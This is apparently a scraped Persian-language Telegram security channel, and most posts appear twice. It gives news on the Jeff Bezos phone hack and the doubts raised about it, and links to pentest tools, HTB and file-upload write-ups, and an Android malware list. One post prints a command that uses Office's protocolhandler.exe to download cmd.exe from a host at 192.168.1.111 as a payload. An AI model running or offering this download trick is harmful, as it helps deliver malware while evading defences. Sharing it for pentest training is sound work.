ابزار اسکنر SN1PER که برای تیم های تست نفوذ و پروژه های گسترده مناسب است.
از امکانات این ابزار میتوان به داشبورد کاربرپسند، جمع آوری و نمایش جذاب اسکرین شاتها، جستجو در بین اهداف و پروژه ها، گزارشاتی همراه با جزییات بیشتر در خصوص هاست های هدف و خروجی گرافیکی از اسکن های nmap اشاره کرد.
https://github.com/1N3/Sn1per
#tools
#pentest
#scanner
@sec_nerd
از امکانات این ابزار میتوان به داشبورد کاربرپسند، جمع آوری و نمایش جذاب اسکرین شاتها، جستجو در بین اهداف و پروژه ها، گزارشاتی همراه با جزییات بیشتر در خصوص هاست های هدف و خروجی گرافیکی از اسکن های nmap اشاره کرد.
https://github.com/1N3/Sn1per
#tools
#pentest
#scanner
@sec_nerd
امنیت اطلاعات
محمدبن سلمان، شاهزاده ی سعودی متهم به هک کردن گوشی مالک آمازون Jeff Bezos ! بنابر گزارش گاردین بن سلمان پس از سفرهای متوالی به امریکا و ارتباط با بخش تکنولوژی این کشور و برقراری رابطه های نزدیک با مالکان شرکت های بزرگ، با جلب اعتماد آنها اقدام به آلوده کردن…
گزارش فنی و جزییات بیشتری از هک شدن گوشی Jeff Bezos توسط شرکت امنیت سایبری FTI منتشر شد
گزارش بسیار مشروح و جالب هست اما ما فقط برخی نکات اون رو در این پست میاریم:
۱- سعود القحطانی دوست و مشاور بن سلمان است و مسئولیت امنیت سایبری، برنامه نویسی و پهپادهای عربستان را برعهده دارد و ارتباط نزدیکی با HackingTeam ایتالیا داشته و ۲۰ درصد از سهام این شرکت را به نمایندگی از این رژیم خریده است. طبق ایمیلهای افشا شده از هکینگ تیم در سال ۲۰۱۵، القحطانی از آنها خواسته است امکان آلوده سازی گوشی ها با ارسال یک ویدیو در واتس اپ را بررسی کنند!
۲-ترافیک خروجی از گوشی جف پس از دریافت ویدیو از بن سلمان از ۴۳۰ کیلوبایت در روز به ۱۲۶ مگابایت در روز افزایش یافت!
۳- پس از آن و چند ماه بعد از سوی بن سلمان تصویر زنی برای جف ارسال شد که جف با او روابط مخفیانه ای داشت و در آن زمان کسی از این ارتباط با خبر نبود. این زن Lauren Sanchez نام دارد.
۴- در ماه های پس از آلوده شدن گوشی، جف در یک جلسه شرکت کرد که گزارشی از میزان حملات کمپین سعودی ها علیه وی را دریافت کند (به خاطر قتل خاشقچی) و بلافاصله و پس از مدت زیادی که پیامی بین او و بن سلمان رد و بدل نشده بود، بن سلمان با ارسال پیامی به او گفت که حرفهایی که میشنود را باور نکند و او یا عربستان هیچ عملی علیه جف انجام نداده اند. این در حالیست که این جلسه به هیچ عنوان عمومی نبوده است.
۵- هیچ یک از ارتباطات و لینک های برقرار شده از گوشی جف به سرور C2 متصل نشده اند ولی با استفاده از یک شبکه سندباکس شده سعی شده است که ترافیک گوشی بررسی شود اما بعضی بدافزارهای پیشرفته با روشهای خاص خود از این کار جلوگیری میکنند و در برخی موارد سندباکس ها را تشخیص میدهند.
۶- نکته جالب اما این است که ویدیوی ارسالی از طریق یک دانلودر رمزنگاری شده که بر روی سرور مدیای واتس اپ قرار دارد ارسال شده است. فایل ویدیو کد مشکوکی ندارد اما امکان بررسی این دانلودر وجود نداشته است.
گزارش کامل؛
https://assets.documentcloud.org/documents/6668313/FTI-Report-into-Jeff-Bezos-Phone-Hack.pdf
#ksa
#mbs
#amazon
#news
#whatsapp
@sec_nerd
گزارش بسیار مشروح و جالب هست اما ما فقط برخی نکات اون رو در این پست میاریم:
۱- سعود القحطانی دوست و مشاور بن سلمان است و مسئولیت امنیت سایبری، برنامه نویسی و پهپادهای عربستان را برعهده دارد و ارتباط نزدیکی با HackingTeam ایتالیا داشته و ۲۰ درصد از سهام این شرکت را به نمایندگی از این رژیم خریده است. طبق ایمیلهای افشا شده از هکینگ تیم در سال ۲۰۱۵، القحطانی از آنها خواسته است امکان آلوده سازی گوشی ها با ارسال یک ویدیو در واتس اپ را بررسی کنند!
۲-ترافیک خروجی از گوشی جف پس از دریافت ویدیو از بن سلمان از ۴۳۰ کیلوبایت در روز به ۱۲۶ مگابایت در روز افزایش یافت!
۳- پس از آن و چند ماه بعد از سوی بن سلمان تصویر زنی برای جف ارسال شد که جف با او روابط مخفیانه ای داشت و در آن زمان کسی از این ارتباط با خبر نبود. این زن Lauren Sanchez نام دارد.
۴- در ماه های پس از آلوده شدن گوشی، جف در یک جلسه شرکت کرد که گزارشی از میزان حملات کمپین سعودی ها علیه وی را دریافت کند (به خاطر قتل خاشقچی) و بلافاصله و پس از مدت زیادی که پیامی بین او و بن سلمان رد و بدل نشده بود، بن سلمان با ارسال پیامی به او گفت که حرفهایی که میشنود را باور نکند و او یا عربستان هیچ عملی علیه جف انجام نداده اند. این در حالیست که این جلسه به هیچ عنوان عمومی نبوده است.
۵- هیچ یک از ارتباطات و لینک های برقرار شده از گوشی جف به سرور C2 متصل نشده اند ولی با استفاده از یک شبکه سندباکس شده سعی شده است که ترافیک گوشی بررسی شود اما بعضی بدافزارهای پیشرفته با روشهای خاص خود از این کار جلوگیری میکنند و در برخی موارد سندباکس ها را تشخیص میدهند.
۶- نکته جالب اما این است که ویدیوی ارسالی از طریق یک دانلودر رمزنگاری شده که بر روی سرور مدیای واتس اپ قرار دارد ارسال شده است. فایل ویدیو کد مشکوکی ندارد اما امکان بررسی این دانلودر وجود نداشته است.
گزارش کامل؛
https://assets.documentcloud.org/documents/6668313/FTI-Report-into-Jeff-Bezos-Phone-Hack.pdf
#ksa
#mbs
#amazon
#news
@sec_nerd
امنیت اطلاعات
گزارش فنی و جزییات بیشتری از هک شدن گوشی Jeff Bezos توسط شرکت امنیت سایبری FTI منتشر شد گزارش بسیار مشروح و جالب هست اما ما فقط برخی نکات اون رو در این پست میاریم: ۱- سعود القحطانی دوست و مشاور بن سلمان است و مسئولیت امنیت سایبری، برنامه نویسی و پهپادهای…
کارشناسان ابهامات متعددی را در خصوص گزارش شرکت FTI مطرح کرده اند.
با توجه به گزارش FTI که بصورت عمومی منتشر شده نقاط تاریکی در ماجرا دیده میشود که نمیتوان با قطعیت به این نتیجه رسید که چه کسی و چگونه گوشی جف را هک کرده است.
سوال اول این است که چرا FTI نتوانست دانلودر را رمزگشایی کند؟
بطور معمول کلیدهای رمزنگاری در کنار فایل enc. مورد اشاره در گزارش وجود دارند و امکان رمزگشایی این فایل با کلیدها وجود دارد. در صورتی که هکرها حمله را طوری طراحی کرده باشند که کلیدها یا دانلودر را نابود کرده باشند امکان رمزگشایی آن وجود ندارد. هر دو سناریو امکانپذیر است اما در گزارش مشخص نیست که دلیل ناتوانی FTI برای رمزگشایی دانلودر چه بوده است.
سوال دوم این است که آیا اصلا داده های گزارش صحت دارند؟
طبق این گزارش میزان حجم خروجی از گوشی جف در روزهای عادی بطور متوسط ۴۳۰ کیلوبایت بوده و این مقدار از ترافیک بکگراند بیشتر تلفن ها کمتر است!
و سوال آخر اینکه آیا اصلا بدافزاری وجود داشته؟؟
طبق گزارش FTI هیچ اثری از بدافزار در این بررسی یافت نشده است. ابهام بزرگ این گزارش اینجاست که فقط رفتار غیرعادی گوشی جف مبنای اصلی آلوده شدن آن به بدافزار قرار گرفته و اینکه چرا FTI اقدام به جیل بریک کردن و بررسی فایلهای سیستمی نکرده است.
اگر این شرکت توان لازم برای آنالیز را نداشت میتوانست از فیسبوک و اپل برای رمزگشایی فایل و بررسی گوشی کمک بگیرد و این موضوع جنجالی را به نتیجه ی مشخص و واضحی برساند.
https://www.cyberscoop.com/jeff-bezos-mbs-hack-fti-report-questions/
#news
#amazon
#ksa
#whatsapp
#facebook
#apple
#iphone
@sec_nerd
با توجه به گزارش FTI که بصورت عمومی منتشر شده نقاط تاریکی در ماجرا دیده میشود که نمیتوان با قطعیت به این نتیجه رسید که چه کسی و چگونه گوشی جف را هک کرده است.
سوال اول این است که چرا FTI نتوانست دانلودر را رمزگشایی کند؟
بطور معمول کلیدهای رمزنگاری در کنار فایل enc. مورد اشاره در گزارش وجود دارند و امکان رمزگشایی این فایل با کلیدها وجود دارد. در صورتی که هکرها حمله را طوری طراحی کرده باشند که کلیدها یا دانلودر را نابود کرده باشند امکان رمزگشایی آن وجود ندارد. هر دو سناریو امکانپذیر است اما در گزارش مشخص نیست که دلیل ناتوانی FTI برای رمزگشایی دانلودر چه بوده است.
سوال دوم این است که آیا اصلا داده های گزارش صحت دارند؟
طبق این گزارش میزان حجم خروجی از گوشی جف در روزهای عادی بطور متوسط ۴۳۰ کیلوبایت بوده و این مقدار از ترافیک بکگراند بیشتر تلفن ها کمتر است!
و سوال آخر اینکه آیا اصلا بدافزاری وجود داشته؟؟
طبق گزارش FTI هیچ اثری از بدافزار در این بررسی یافت نشده است. ابهام بزرگ این گزارش اینجاست که فقط رفتار غیرعادی گوشی جف مبنای اصلی آلوده شدن آن به بدافزار قرار گرفته و اینکه چرا FTI اقدام به جیل بریک کردن و بررسی فایلهای سیستمی نکرده است.
اگر این شرکت توان لازم برای آنالیز را نداشت میتوانست از فیسبوک و اپل برای رمزگشایی فایل و بررسی گوشی کمک بگیرد و این موضوع جنجالی را به نتیجه ی مشخص و واضحی برساند.
https://www.cyberscoop.com/jeff-bezos-mbs-hack-fti-report-questions/
#news
#amazon
#ksa
#apple
#iphone
@sec_nerd
CyberScoop
The big questions from FTI's report on the Jeff Bezos hack
FTI's investigation has raised more questions about what actually happened on the Amazon founder's phone.
دانلود فایل باینری با استفاده از protocolhandler.exe در آفیس
C:\[office installed folder]\root\[version]\
protocolhandler.exe "https://192.168.1.111/cmd.exe"
https://youtu.be/eUTFeRwZxH0
#office
#windows
#pentest
@sec_nerd
C:\[office installed folder]\root\[version]\
protocolhandler.exe "https://192.168.1.111/cmd.exe"
https://youtu.be/eUTFeRwZxH0
#office
#windows
#pentest
@sec_nerd
YouTube
Payload download via Office Binary protocolhandler.exe
C:\[office installed folder]\root\[version]\ protocolhandler.exe "https://192.168.1.111/cmd.exe"
رمزگشایی فایل های رمزنگاری شده ی whatsapp
https://github.com/ddz/whatsapp-media-decrypt
#whatsapp
@sec_nerd
https://github.com/ddz/whatsapp-media-decrypt
@sec_nerd
GitHub
GitHub - ddz/whatsapp-media-decrypt: Decrypt WhatsApp encrypted media files
Decrypt WhatsApp encrypted media files. Contribute to ddz/whatsapp-media-decrypt development by creating an account on GitHub.
معرفی ابزارهای انجام عملیات بر روی پسوردها اعم از کرک، مدیریت و بازیابی
https://www.phishy.website/password-utilities.shtml
#password
#crack
#hashcat
@sec_nerd
https://www.phishy.website/password-utilities.shtml
#password
#crack
#hashcat
@sec_nerd
www.phishy.website
Password Utilities - phishy.website
Password Utilities can be used for management, recovery, cracking, and stress testing your password or phrase.
پیشنهادات NSA در خصوص امنیت سیستم های ابری
https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF
#nsa
#cloud
#security
@sec_nerd
https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF
#nsa
#cloud
#security
@sec_nerd
رایت آپ چالش HTB با نام Hawk
https://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd
#writeup
#htb
@sec_nerd
https://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd
#writeup
#htb
@sec_nerd
رایت آپ چالش HTB با نام Lightweight
https://medium.com/@ranakhalil101/hack-the-box-lightweight-writeup-w-o-metasploit-855a5fcf7b82
#writeup
#htb
@sec_nerd
https://medium.com/@ranakhalil101/hack-the-box-lightweight-writeup-w-o-metasploit-855a5fcf7b82
#writeup
#htb
@sec_nerd
رایت آپهای مرتبط با ضعف آپلودرها
Unrestricted file upload
https://link.medium.com/sILCWr8xB3
https://link.medium.com/V8SdaJ8xB3
https://noobe.io/articles/2019-09/exploiting-cookie-based-xss-by-finding-rce
https://link.medium.com/6qTQZwayB3
https://anotherhackerblog.com/exploiting-file-uploads-pt-2
https://link.medium.com/1wFiIWayB3
https://link.medium.com/5rv5CbbyB3
https://mustafakemalcan.com/asus-rce-vulnerability-on-rma-asus-europe-eu
https://link.medium.com/jFGhtvbyB3
https://link.medium.com/fRfag0byB3
#bougbounty
#writeup
#pentest
#web
@sec_nerd
Unrestricted file upload
https://link.medium.com/sILCWr8xB3
https://link.medium.com/V8SdaJ8xB3
https://noobe.io/articles/2019-09/exploiting-cookie-based-xss-by-finding-rce
https://link.medium.com/6qTQZwayB3
https://anotherhackerblog.com/exploiting-file-uploads-pt-2
https://link.medium.com/1wFiIWayB3
https://link.medium.com/5rv5CbbyB3
https://mustafakemalcan.com/asus-rce-vulnerability-on-rma-asus-europe-eu
https://link.medium.com/jFGhtvbyB3
https://link.medium.com/fRfag0byB3
#bougbounty
#writeup
#pentest
#web
@sec_nerd
Medium
Dank Writeup On Broken Access Control On An Indian Startup
This writeup is about a critical broken access control along with unrestricted file upload on the server. This company had a bug bounty…
لیست بدافزارهای اندرویدی فعال و توضیح یک خطی در مورد نحوه فعالیت هرکدام
https://forensics.spreitzenbarth.de/android-malware/
#android
#malware
@sec_nerd
https://forensics.spreitzenbarth.de/android-malware/
#android
#malware
@sec_nerd